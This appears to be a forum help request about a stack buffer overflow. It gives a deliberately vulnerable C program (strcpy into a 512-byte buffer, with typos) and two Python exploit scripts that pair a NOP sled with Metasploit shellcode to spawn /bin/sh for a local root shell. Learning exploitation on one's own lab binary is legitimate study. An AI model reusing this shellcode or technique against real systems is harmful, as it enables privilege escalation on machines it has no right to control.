- Code: Select all
int main(int argc, char ** argv[])
{
if(argc > 2)
{
fillbuffer(argv[1]);
}
}
void fillbuffer(char *buf[])
{
char weakbuff[512];
strcpy(weakbuf, buf);
}
so far I have written the following code in python to exploit the above program
- Code: Select all
#!/usr/bin/python
import os, sys, subprocess
# test buffer to see how many char I need to get a segfault
#buffer = "\x43" * 520
init = "\x90" * 200
pad = "\x43" * 133
eip = "\x45\x46\x47\x48"
end_pad = "\x44" * 9
# shell to launch /bin/sh 191 bytes
shellcode = (#unsigned char buf[] =
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x2d\x6e\x65\x20\x27"
"\x5c\x78\x36\x61\x5c\x78\x30\x62\x5c\x78\x35\x38\x5c\x78\x39"
"\x39\x5c\x78\x35\x32\x5c\x78\x36\x36\x5c\x78\x36\x38\x5c\x78"
"\x32\x64\x5c\x78\x36\x33\x5c\x78\x38\x39\x5c\x78\x65\x37\x5c"
"\x78\x36\x38\x5c\x78\x32\x66\x5c\x78\x37\x33\x5c\x78\x36\x38"
"\x5c\x78\x30\x30\x5c\x78\x36\x38\x5c\x78\x32\x66\x5c\x78\x36"
"\x32\x5c\x78\x36\x39\x5c\x78\x36\x65\x5c\x78\x38\x39\x5c\x78"
"\x65\x33\x5c\x78\x35\x32\x5c\x78\x65\x38\x5c\x78\x30\x38\x5c"
"\x78\x30\x30\x5c\x78\x30\x30\x5c\x78\x30\x30\x5c\x78\x32\x66"
"\x5c\x78\x36\x32\x5c\x78\x36\x39\x5c\x78\x36\x65\x5c\x78\x32"
"\x66\x5c\x78\x37\x33\x5c\x78\x36\x38\x5c\x78\x30\x30\x5c\x78"
"\x35\x37\x5c\x78\x35\x33\x5c\x78\x38\x39\x5c\x78\x65\x31\x5c"
"\x78\x63\x64\x5c\x78\x38\x30\x27\x7c\x73\x68")
crash = init + shellcode + pad + eip + end_pad
#program to exploit
function = "/home/sploited/Desktop/vuln "
os.system(function + crash)
my problem is when I try to run the code it appears as if the c program is actually executing the shellcode as it fills the buffer.
when I run the python program I get the message:
sh: 1: shCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCEFGHDDDDDDDDD: not found
when I look at the python program through GDB with set follow-fork-mode child, I see that a /bin/sh shell is spawned, generates the error above, and closes.
Is there any reason why the shellcode would be executed before I have the eip jump onto the nop slide? I am generating the payload with metasploit. I am trying to get a local root shell on the box so I am using the linux/x86/exec payload with the CMD = /bin/sh. I have tried several different encoders, all of which result in errors unless I use the cmd/generic_sh. The machine is a Debian 6 box and a ubuntu 12 box.
any help would be greatly appreciated.
Thanks in advance.
-- Tue Oct 01, 2013 11:53 pm --
- Code: Select all
#!/usr/bin/python
import os, struct
init = "\x90" * 321
pad = "\x43" * 133
#08064e21
eip = "\x21\x4e\x06\x08"
end_pad = "\x44" * 0
shellcode = (#unsigned char buf[] =
"\xba\xc2\xdd\xe1\xd7\xda\xd9\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x0b\x31\x56\x15\x83\xee\xfc\x03\x56\x11\xe2\x37\xb7" +
"\xea\x8f\x2e\x1a\x8b\x47\x7d\xf8\xda\x7f\x15\xd1\xaf\x17" +
"\xe5\x45\x7f\x8a\x8c\xfb\xf6\xa9\x1c\xec\x01\x2e\xa0\xec" +
"\x3e\x4c\xc9\x82\x6f\xe3\x61\x5b\x27\x50\xf8\xba\x0a\xd6" )
crash = init + shellcode + pad + eip + end_pad
env = {"":shellcode}
function = "/home/sploited/Desktop/vuln"
os.execve(function,[function, crash], env)
I have updated the code. It now states that is has a segmentation fault during runtime on the target machine (Debian 6 and ubuntu 12) but it seems to run fine on backtrack.